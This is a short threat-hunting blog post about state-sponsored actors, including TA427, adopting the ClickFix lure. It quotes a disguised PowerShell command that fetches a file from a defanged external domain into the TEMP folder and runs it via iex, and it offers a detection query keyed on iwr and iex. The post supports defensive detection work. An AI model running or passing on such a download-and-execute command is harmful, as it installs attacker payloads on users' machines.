112. State-Sponsored Threat Actors Adopted ClickFix Technique

Hello everyone! We've talked about ClickFix a few times already. But it's quite interesting how various adopt this technique.

According to Proofpoint report, multiple state-sponsored adversaries started to use this technique. For example, TA427 (we track this activity cluster under the name Monolithic Werewolf). The threat actor masquaraded malicious PowerShell command to look like a registration code:

powershell -windowstyle hidden -Command iwr

      "hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile

      "$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex

      $c;                                                                    

               3Z5TY-76FR3-9G87H-7ZC56

As you can see, the command includes some very typical cmdlet names, for example, "iwr" and "iex". Of course, we can use it for hunting (or even detection!):

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")

Have you observed any other interesting ClickFix adoptions?

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge